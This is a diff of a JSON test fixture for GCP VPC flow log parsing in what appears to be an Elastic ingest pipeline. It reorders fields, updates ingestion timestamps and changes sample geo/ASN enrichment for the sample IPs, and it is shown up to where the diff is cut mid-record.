@@ -13509,41 +14167,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "192.168.2.117", - "port": 58026, - "bytes": 1467, - "ip": "192.168.2.117", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:GlCQ5a9VOJVReAwOuh722hRVrD0=", - "bytes": 1467, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" @@ -13554,6 +14177,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -13574,8 +14200,28 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "America", + "country_name": "usa" + }, + "as": { + "number": 15169 + }, + "address": "192.168.2.117", + "port": 58026, + "bytes": 1467, + "ip": "192.168.2.117", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391928100Z", + "ingested": "2021-12-14T14:43:27.415244346Z", "original": "{\"insertId\":\"bxuq05fhgmw8z\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58026},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"40\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:49:08.995009558Z", @@ -13583,6 +14229,18 @@ "id": "bxuq05fhgmw8z", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:GlCQ5a9VOJVReAwOuh722hRVrD0=", + "bytes": 1467, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { 
@@ -13597,11 +14255,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -13670,7 +14333,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391933700Z", + "ingested": "2021-12-14T14:43:27.415244761Z", "original": "{\"insertId\":\"bxuq05fhgmw9b\",\"jsonPayload\":{\"bytes_sent\":\"19506\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866699945Z", 
@@ -13681,41 +14344,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 32882, - "bytes": 1496, - "ip": "67.43.156.13", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:FXnFBvk886dW60zh9GYIhTfux90=", - "bytes": 1496, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" @@ -13726,6 +14354,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -13746,8 +14377,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 32882, + "bytes": 1496, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391939500Z", + "ingested": "2021-12-14T14:43:27.415245255Z", "original": "{\"insertId\":\"bxuq05fhgmw8y\",\"jsonPayload\":{\"bytes_sent\":\"1496\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":32882},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:44:07.689331553Z", 
@@ -13755,6 +14411,18 @@ "id": "bxuq05fhgmw8y", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:FXnFBvk886dW60zh9GYIhTfux90=", + "bytes": 1496, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -13845,7 +14513,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391945Z", + "ingested": "2021-12-14T14:43:27.415245644Z", "original": "{\"insertId\":\"bxuq05fhgmw9e\",\"jsonPayload\":{\"bytes_sent\":\"155675\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60126,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"288\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.019841536Z", 
@@ -13856,18 +14524,53 @@ } }, { + "@timestamp": "2019-06-14T03:50:16.593Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", "port": 32882, "ip": "67.43.156.13" }, 
@@ -13879,6 +14582,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415246089Z", + "original": "{\"insertId\":\"bxuq05fhgmw98\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":32882,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:44:07.689331553Z", + "end": "2019-06-14T03:44:07.811355936Z", + "id": "bxuq05fhgmw98", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -13890,25 +14603,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -13919,23 +14631,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 15 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391950300Z", - "original": "{\"insertId\":\"bxuq05fhgmw98\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":32882,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:44:07.689331553Z", - "end": "2019-06-14T03:44:07.811355936Z", - "id": "bxuq05fhgmw98", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -13944,11 +14647,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 39568, 
@@ -13956,6 +14664,16 @@ "ip": "67.43.156.13", "packets": 2400 }, + "event": { + "ingested": "2021-12-14T14:43:27.415246554Z", + "original": "{\"insertId\":\"bxuq05fhgmw96\",\"jsonPayload\":{\"bytes_sent\":\"28304484\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":39568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"2400\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.480787267Z", + "end": "2019-06-14T03:49:02.085146013Z", + "id": "bxuq05fhgmw96", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -13967,19 +14685,30 @@ "iana_number": "6", "packets": 2400, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 15 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -13990,36 +14719,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 15 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391955900Z", - "original": "{\"insertId\":\"bxuq05fhgmw96\",\"jsonPayload\":{\"bytes_sent\":\"28304484\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":39568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"2400\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.480787267Z", - "end": "2019-06-14T03:49:02.085146013Z", - "id": "bxuq05fhgmw96", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 39568, 
@@ -14033,6 +14746,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415246958Z", + "original": "{\"insertId\":\"bxuq05fhgmw99\",\"jsonPayload\":{\"bytes_sent\":\"2962242\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":39568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"1340\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.480787267Z", + "end": "2019-06-14T03:49:02.085146013Z", + "id": "bxuq05fhgmw99", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -14044,22 +14767,27 @@ "iana_number": "6", "packets": 1340, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "10.87.40.76", + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 15 + "ms": 40 } }, "source": { 
@@ -14075,21 +14803,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391961400Z", - "original": "{\"insertId\":\"bxuq05fhgmw99\",\"jsonPayload\":{\"bytes_sent\":\"2962242\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":39568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"1340\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.480787267Z", - "end": "2019-06-14T03:49:02.085146013Z", - "id": "bxuq05fhgmw99", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", 
@@ -14110,6 +14823,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415247377Z", + "original": "{\"insertId\":\"bxuq05fhgmw93\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58026,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"40\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:08.995009558Z", + "end": "2019-06-14T03:49:09.114674887Z", + "id": "bxuq05fhgmw93", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -14121,46 +14844,6 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:16.593Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "192.168.2.117" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 40 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391967100Z", - "original": "{\"insertId\":\"bxuq05fhgmw93\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58026,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"40\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:08.995009558Z", - "end": "2019-06-14T03:49:09.114674887Z", - "id": "bxuq05fhgmw93", - "category": "network", - "type": "connection" } }, { 
@@ -14169,11 +14852,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -14251,7 +14939,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391971100Z", + "ingested": "2021-12-14T14:43:27.415247798Z", "original": "{\"insertId\":\"bxuq05fhgmw9f\",\"jsonPayload\":{\"bytes_sent\":\"9611\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"101\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510575555Z", 
@@ -14267,11 +14955,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -14346,7 +15039,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391975Z", + "ingested": "2021-12-14T14:43:27.415248295Z", "original": 